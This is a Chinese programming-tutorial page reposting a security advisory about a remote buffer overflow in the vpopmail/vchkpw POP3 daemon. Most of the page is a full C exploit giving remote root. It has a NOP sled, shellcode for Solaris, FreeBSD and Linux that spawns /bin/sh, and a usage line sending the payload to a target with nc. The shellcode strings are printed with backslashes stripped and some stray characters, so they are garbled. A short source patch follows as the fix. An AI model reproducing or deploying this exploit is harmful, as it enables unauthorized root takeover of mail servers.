论坛交流
首页办公自动化| 网页制作| 平面设计| 动画制作| 数据库开发| 程序设计| 全部视频教程
应用视频: Windows | Word2007 | Excel2007 | PowerPoint2007 | Dreamweaver 8 | Fireworks 8 | Flash 8 | Photoshop cs | CorelDraw 12
编程视频: C语言视频教程 | HTML | Div+Css布局 | Javascript | Access数据库 | Asp | Sql Server数据库Asp.net  | Flash AS
当前位置 > 文字教程 > C语言程序设计教程
Tag:新手,函数,指针,数据类型,对象,Turbo,入门,运算符,数组,结构,二级,,tc,游戏,试题,问答,编译,视频教程

vpopmail/vchkpw存在远程溢出漏洞,使入侵者能远程获得root权限

文章类别:C语言程序设计 | 发表日期:2008-9-24 14:37:44

vpopmail/vchkpw存在远程溢出漏洞,使入侵者能远程获得root权限
由于vpopmail/vchkpw版本pop3d程序中的popup.c对边界检查的错误,使得该程序存在远程溢出。而该程序一般又是以root身份启动的,所以远程的入侵者将可能利用该漏洞远程获得您系统的root权限。

以下代码仅仅用来测试和研究这个漏洞,假如您将其用于不正当的途径请后果自负。
----------------------------
/*
qmail-qpop3d-vchkpw.c (v.3)
by: K2,

The inter7 supported vchkpw/vpopmail package (replacement for chkeckpasswd)
has big problems ;)

gcc -o vpop qmail-pop3d-vchkpw.c [-DBSD|-DSX86]
( ./vpop [offset] [alignment] ; cat ) | nc target.com 110

play with the alignment to get it to A) crash B) work.
qmail-pop3d/vchkpw remote exploit. (Sol/x86,linux/x86,Fbsd/x86) for now.
Tested agenst: linux-2.2.1[34], FreeBSD 3.[34]-RELEASE
vpopmail-3.4.10a/vpopmail-3.4.11[b-e]

Hi plaguez.
prop's to Interrupt for testing with bsd, _eixon an others ;)
cheez shell's :)
THX goes out to STARBUCKS*!($#!
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SIZE 260
#define NOP 0x90
#ifdef SX86
#define DEFOFF 0x8047cfc
#define NOPDEF 75
#elif BSD
#define DEFOFF 0xbfbfdbbf
#define NOPDEF 81
#else
#define DEFOFF 0xbffffcd8
#define NOPDEF 81
#endif

char *shell =
#ifdef SX86 // Solaris IA32 shellcode, cheez
"xebx48x9axffxffxffxffx07xffxc3x5ex31xc0x89x46xb4"
"x88x46xb9x88x46x07x89x46x0cx31xc0x50xb0x8dxe8xdf"
"xffxffxffx83xc4x04x31xc0x50xb0x17xe8xd2xffxffxff"
"x83xc4x04x31xc0x50x8dx5ex08x53x8dx1ex89x5ex08x53"
"xb0x3bxe8xbbxffxffxffx83xc4x0cxe8xbbxffxffxffx2f"
"x62x69x6ex2fx73x68xffxffxffxffxffxffxffxffxff";
#elif BSD // fBSD shellcode, mudge@l0pht.com
"xebx35x5ex59x33xc0x89x46xf5x83xc8x07x66x89x46xf9"
"x8dx1ex89x5ex0bx33xd2x52x89x56x07x89x56x0fx8dx46"
"x0bx50x8dx06x50xb8x7bx56x34x12x35x40x56x34x12x51"
"x9a>:)(:<xe8xc6xffxffxff/bin/sh";
#else // Linux shellcode, no idea
"xebx22x5ex89xf3x89xf7x83xc7x07x31xc0xaa"
"x89xf9x89xf0xabx89xfax31xc0xabxb0x08x04"
"x03xcdx80x31xdbx89xd8x40xcdx80xe8xd9xff"
"xffxff/bin/shxff";
#endif

int main(int argc, char **argv)
{
int i=0,esp=0,offset=0,nop=NOPDEF;
char buffer[SIZE];

if (argc > 1) offset += strtol(argv[1], NULL, 0);
if (argc > 2) nop += strtol(argv[2], NULL, 0);

esp = DEFOFF;

memset(buffer, NOP, SIZE);
memcpy(buffer+nop, shell, strlen(shell));
for (i = (nop+strlen(shell)+1); i < SIZE; i += 4) {
*((int *) &buffer[i]) = esp+offset;
}

printf("user %s ",buffer);
printf("pass ADMR0X&*!(#&*(! ");

fprintf(stderr," buflen = %d, nops = %d, target = 0x%x ",strlen(buffer),nop,esp+offset);
return(0);
}
--------------------------------------------------------------------


解决方案:
请临时使用这个由该漏洞发现者发布的补丁程序修补vpopmail/vchkpw

---------------------------------------------------------------

#include "readwrite.h"
#include "timeoutread.h"
#include "timeoutwrite.h"
+#include <unistd.h>
+#include <syslog.h>

void die() { _exit(1); }

@@ -87,6 +89,24 @@
int child;
int wstat;
int pi[2];
+
+ /*
+ This patch should have minimal impact of normal qmail operations.
+ It was coded/tested under linux, but should work most everywhere.
+ */
+
+ if(strlen(user) >= 40)
+ {
+ syslog(LOG_NOTICE,"excessive argument length [%d]",strlen(user));
+ user[39]='';
+ userlen=strlen(user);
+ }
+
+ if(strlen(pass) >= 40)
+ {
+ syslog(LOG_NOTICE,"excessive argument length [%d]",strlen(pass));
+ pass[39]='';
+ }

if (fd_copy(2,1) == -1) die_pipe();
close(3);
视频教程列表
文章教程搜索
 
C语言程序设计推荐教程
C语言程序设计热门教程
看全部视频教程
购买方式/价格
购买视频教程: 咨询客服
tel:15972130058